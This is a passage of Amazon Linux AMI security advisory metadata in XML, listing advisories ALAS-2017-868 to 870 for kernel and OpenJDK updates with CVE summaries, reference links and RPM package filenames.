arch="i686"><filename>Packages/php70-dbg-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.21" release="1.23.amzn1" 
epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.21-1.23.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.21" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.21-1.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-868</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-868: critical priority package update for kernel</title><issued date="2017-08-10 16:31:00" /><updated date="2017-10-26 23:11:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-11176:
The mq_notify function in the Linux kernel through 4.11.9 does not set the sock pointer to NULL upon entry into the retry logic. During a user-space close of a Netlink socket, it allows attackers to possibly cause a situation where a value may be used after being freed (use-after-free), which may lead to memory corruption or other unspecified impact.
1470659:
CVE-2017-11176 kernel: Use-after-free in sys_mq_notify()
CVE-2017-1000112:
Exploitable memory corruption due to UFO to non-UFO path switch
CVE-2017-1000111:
heap out-of-bounds in AF_PACKET sockets
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000111" title="" id="CVE-2017-1000111" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000112" title="" id="CVE-2017-1000112" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11176" title="" id="CVE-2017-11176" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.38" release="16.35.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.38" release="16.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.38-16.35.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.38" release="16.35.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.38" release="16.35.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-headers-4.9.38-16.35.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.38" release="16.35.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.38-16.35.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-869</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-869: critical priority package update for java-1.7.0-openjdk</title><issued date="2017-08-15 17:30:00" /><updated date="2017-08-15 17:30:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-10243:
It was discovered that the wsdlimport tool in the JAX-WS component of OpenJDK did not use secure XML parser settings when parsing WSDL XML documents. A specially crafted WSDL document could cause wsdlimport to use an excessive amount of CPU and memory, open connections to other hosts, or leak information.
1472666:
CVE-2017-10243 OpenJDK: insecure XML parsing in wsdlimport (JAX-WS, 8182054)
CVE-2017-10135:
A covert timing channel flaw was found in the PKCS#8 implementation in the JCE component of OpenJDK. A remote attacker able to make a Java application repeatedly compare a PKCS#8 key against an attacker-controlled value could possibly use this flaw to determine the key via a timing side channel.
1471871:
CVE-2017-10135 OpenJDK: PKCS#8 implementation timing attack (JCE, 8176760)
CVE-2017-10116:
It was discovered that the LDAPCertStore class in the Security component of OpenJDK followed LDAP referrals to arbitrary URLs. A specially crafted LDAP referral URL could cause LDAPCertStore to communicate with non-LDAP servers.
1471738:
CVE-2017-10116 OpenJDK: LDAPCertStore following referrals to non-LDAP URLs (Security, 8176067)
CVE-2017-10115:
A covert timing channel flaw was found in the DSA implementation in the JCE component of OpenJDK. A remote attacker able to make a Java application generate DSA signatures on demand could possibly use this flaw to extract certain information about the used key via a timing side channel.
1471851:
CVE-2017-10115 OpenJDK: DSA implementation timing attack (JCE, 8175106)
CVE-2017-10110:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1471523:
CVE-2017-10110 OpenJDK: insufficient access control checks in ImageWatched (AWT, 8174098)
CVE-2017-10109:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131; JRockit: R28.3.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1471670:
CVE-2017-10109 OpenJDK: unbounded memory allocation in CodeSource deserialization (Serialization, 8174113)
CVE-2017-10108:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131; JRockit: R28.3.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1471888:
CVE-2017-10108 OpenJDK: unbounded memory allocation in BasicAttribute deserialization (Serialization, 8174105)
CVE-2017-10107:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1471266:
CVE-2017-10107 OpenJDK: insufficient access control checks in ActivationID (RMI, 8173697)
CVE-2017-10102:
It was discovered that the DGC implementation in the RMI component of OpenJDK failed to correctly handle references. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the RMI registry or a Java RMI application.
1472345:
CVE-2017-10102 OpenJDK: incorrect handling of references in DGC (RMI, 8163958)
CVE-2017-10101:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: JAXP). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1471527:
CVE-2017-10101 OpenJDK: unrestricted access to com.sun.org.apache.xml.internal.resolver (JAXP, 8173286)
CVE-2017-10096:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: JAXP). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1471528:
CVE-2017-10096 OpenJDK: insufficient access control checks in XML transformations (JAXP, 8172469)
CVE-2017-10090:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 7u141 and 8u131; Java SE Embedded: 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1471517:
CVE-2017-10090 OpenJDK: insufficient access control checks in AsynchronousChannelGroupImpl (8172465, Libraries)
CVE-2017-10089:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: ImageIO). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1471270:
CVE-2017-10089 OpenJDK: insufficient access control checks in ServiceRegistry (ImageIO, 8172461)
CVE-2017-10087:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1471521:
CVE-2017-10087 OpenJDK: insufficient access control checks in ThreadPoolExecutor (Libraries, 8172204)
CVE-2017-10081:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N).
1471711:
CVE-2017-10081 OpenJDK: incorrect bracket processing in function signature handling (Hotspot, 8170966)
CVE-2017-10074:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1471534:
CVE-2017-10074 OpenJDK: integer overflows in range check loop predicates (Hotspot, 8173770)
CVE-2017-10067:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H).
1471535:
CVE-2017-10067 OpenJDK: JAR verifier incorrect handling of missing digest (Security, 8169392)
CVE-2017-10053:
It was discovered that the JPEGImageReader implementation in the 2D component of OpenJDK would, in certain cases, read all image data even if it was not used later. A specially crafted image could cause a Java application to temporarily use an excessive amount of CPU and memory.
1471889:
CVE-2017-10053 OpenJDK: reading of unprocessed image data in JPEGImageReader (2D, 8169209)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10053" title="" id="CVE-2017-10053" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10067" title="" id="CVE-2017-10067" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10074" title="" id="CVE-2017-10074" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10081" title="" id="CVE-2017-10081" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10087" title="" id="CVE-2017-10087" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10089" title="" id="CVE-2017-10089" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10090" title="" id="CVE-2017-10090" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10096" title="" id="CVE-2017-10096" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10101" title="" id="CVE-2017-10101" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10102" title="" id="CVE-2017-10102" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10107" title="" id="CVE-2017-10107" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10108" title="" id="CVE-2017-10108" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10109" title="" id="CVE-2017-10109" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10110" title="" id="CVE-2017-10110" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10115" title="" id="CVE-2017-10115" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10116" title="" id="CVE-2017-10116" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10135" title="" id="CVE-2017-10135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10243" title="" id="CVE-2017-10243" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.151-2.6.11.0.74.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.151-2.6.11.0.74.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.151-2.6.11.0.74.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.151-2.6.11.0.74.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.151-2.6.11.0.74.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.151-2.6.11.0.74.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.151-2.6.11.0.74.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.151-2.6.11.0.74.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.151-2.6.11.0.74.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.151-2.6.11.0.74.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.151" release="2.6.11.0.74.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.151-2.6.11.0.74.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-870</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-870: important priority package update for kernel</title><issued date="2017-08-17 18:09:00" /><updated date="2017-11-03 05:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8831:
The saa7164_bus_get function in drivers/media/pci/saa7164/saa7164-bus.c in the Linux kernel through 4.10.14 allows local users to cause a denial of service (out-of-bounds array access) or possibly have unspecified other impact by changing a certain sequence-number value, aka a &quot;double fetch&quot; vulnerability.
1449980:
CVE-2017-8831 kernel: Double fetch vulnerability in saa7164_bus_get function
CVE-2017-7542:
An integer overflow vulnerability was found in the ip6_find_1stfragopt() function. A local attacker with the privileges (CAP_NET_RAW) to open a raw socket can cause an infinite loop inside the ip6_find_1stfragopt() function.
1473649:
CVE-2017-7542 kernel: Integer overflow in ip6_find_1stfragopt() causes infinite loop
CVE-2017-7533:
A race condition was found in the Linux kernel, present since v3.14-rc1 through v4.12. The race happens between threads of inotify_handle_event() and vfs_rename() while running the rename operation against the same file. As a result of the race, the next slab data or the slab&#039;s free-list pointer can be corrupted with attacker-controlled data, which may lead to privilege escalation.
1468283:
CVE-2017-7533 kernel: a race between inotify_handle_event() and sys_rename()
CVE-2017-11473:
Buffer overflow in the mp_override_legacy_irq() function in arch/x86/kernel/acpi/boot.c in the Linux kernel through 4.12.2 allows local users to gain privileges via a crafted ACPI table.
1473209:
CVE-2017-11473 kernel: Buffer overflow in mp_override_legacy_irq()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11473" title="" id="CVE-2017-11473" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7533" title="" id="CVE-2017-7533" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7542" title="" id="CVE-2017-7542" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8831" title="" id="CVE-2017-8831" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.43" release="17.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.43-17.38.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" 